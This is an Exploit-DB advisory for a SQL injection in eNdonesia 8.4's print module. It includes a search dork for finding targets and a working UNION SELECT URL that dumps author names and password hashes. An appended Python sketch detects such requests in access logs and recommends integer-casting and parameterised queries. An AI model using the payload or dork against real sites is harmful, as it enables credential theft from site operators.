eNdonesia 8.4 – SQL Injection

  • Author: vYc0d
    Date: 2010-09-15
  • Category:
    Platform:
  • Source: https://www.exploit-db.com/exploits/15006/
  • ======================================================================/
     eNdonesia 8.4 (Print Module) SQL Injection Vulnerability
     
     Download : http://sourceforge.net/projects/endonesia/files/eNdonesia
     Version: 8.4 (lower versions may also be affected)
     Dork : mod.php?mod=publisher&op=printarticle&artid=
    
    ======================================================================/
     
     Author: vYc0d
     Contact : vyc0d@hackermail.com
     Site: http://vyc0d.uni.cc
     Date: 15-10-2010
    
    ==============================================================================================/
    
    [Vulnerable File]
    
    http://localhost/[eNdonesia 8.4]/mod.php?mod=publisher&op=printarticle&artid=[valid id][sql-i]
    
    
    [ DEMO ]
     
    http://www.site.com/mod.php?mod=publisher&op=printarticle&artid=-47+union+select+1,concat_ws%280x3a,aid,name,pwd%29,3,4,5,6,7+from+authors--
     
    ===================================================================================================================================================/
     
    [ Thanks to ]
     
    [-] Allah SWT, Muhammad SAW, My Family
    [-] The big Family of :
    [-] M0slem Hax0r - Echo - Indonesian Coder - Jasakom - Indonesian Hackers - Malang Cyber Crew 
    [-] ManadoCoding - Devilzc0de - Yogyacarderlink - Xcode - Hacker Newbie - Persiland Security
    [-] Klix ITN Malang - Kolam (Komunitas Linux Arek Malang)
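
Detection sketch for the issue above, added here as an example and not part of the original advisory or of eNdonesia: it scans web access logs for printarticle requests whose artid is not a plain integer. The log lines, the combined log format and the function name are constructed assumptions; the second sample line reuses the query string from the DEMO section.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Constructed sample access-log lines (combined log format); not real traffic.
SAMPLE_LOG = [
    '203.0.113.5 - - [15/Sep/2010:10:00:01 +0000] "GET /mod.php?mod=publisher'
    '&op=printarticle&artid=47 HTTP/1.1" 200 5120',
    '203.0.113.9 - - [15/Sep/2010:10:00:07 +0000] "GET /mod.php?mod=publisher'
    '&op=printarticle&artid=-47+union+select+1,concat_ws%280x3a,aid,name,pwd%29,'
    '3,4,5,6,7+from+authors-- HTTP/1.1" 200 812',
    '203.0.113.5 - - [15/Sep/2010:10:00:09 +0000] "GET /index.php HTTP/1.1" 200 7340',
    # Parameters in a different order, with a URL-encoded quote after the id.
    '203.0.113.7 - - [15/Sep/2010:10:00:12 +0000] "GET /mod.php?op=printarticle'
    '&artid=47%27&mod=publisher HTTP/1.1" 500 0',
]

REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')
VALID_ID = re.compile(r"[0-9]{1,10}")  # an article id should be digits only


def suspicious_print_requests(lines):
    """Return (client_ip, decoded artid) for each printarticle request
    whose artid value is anything other than a plain integer."""
    hits = []
    for line in lines:
        match = REQUEST_RE.search(line)
        if not match:
            continue
        url = urlsplit(match.group(1))
        if not url.path.endswith("/mod.php"):
            continue
        # parse_qs URL-decodes values and keeps repeated parameters as a list,
        # so parameter order, encoding and duplicates do not hide a value.
        query = parse_qs(url.query, keep_blank_values=True)
        if "publisher" not in query.get("mod", []):
            continue
        if "printarticle" not in query.get("op", []):
            continue
        for value in query.get("artid", []):
            if not VALID_ID.fullmatch(value):
                hits.append((line.split()[0], value))
    return hits


if __name__ == "__main__":
    for ip, value in suspicious_print_requests(SAMPLE_LOG):
        print(f"{ip}\tartid={value!r}")
```

The same digits-only rule applies on the server side: reject or integer-cast artid before it reaches the query, and bind it as a parameter rather than concatenating it into SQL.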